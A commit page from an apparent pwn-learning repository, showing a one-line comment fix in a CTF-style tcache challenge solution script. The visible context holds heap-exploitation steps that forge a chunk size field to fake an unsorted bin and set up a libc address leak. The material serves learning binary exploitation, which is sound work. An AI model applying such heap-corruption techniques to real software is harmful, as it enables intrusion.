bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Correction on Comment of TCache/tcache

Browse Source
This commit is contained in:
Jack Ren
2022-03-06 20:44:59 +08:00
parent 84e9ec0136
commit 3df738d5bc
1 changed files with 1 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
TCache/tcache/answer.py
View File

@@ -43,7 +43,7 @@ The size range of TCache is [0x20, 0x410].
# Step 1: Fake an unsorted bin
for _ in range(19):
create(p64(0xdeadbeef00000000 + _) + '\n') # Create 19 consecutive chunk of 0x40 size, #0 ~ #18
edit(0, '\x00' * 0x38 + p64(0x40 * 17 + 0x1)) # Write the second chunk's size field to 17 times the original (0x440 > 0x400, enter unsorted bin), leaving the last chunk unmodified
edit(0, '\x00' * 0x38 + p64(0x40 * 17 + 0x1)) # Write the second chunk's size field to 17 times the original (0x440 > 0x410, enter unsorted bin), leaving the last chunk unmodified
delete(1) # Free the fake unsorted bin, #1
# Step 2: Leak LibC address by leaking the `fd` field of unsorted bin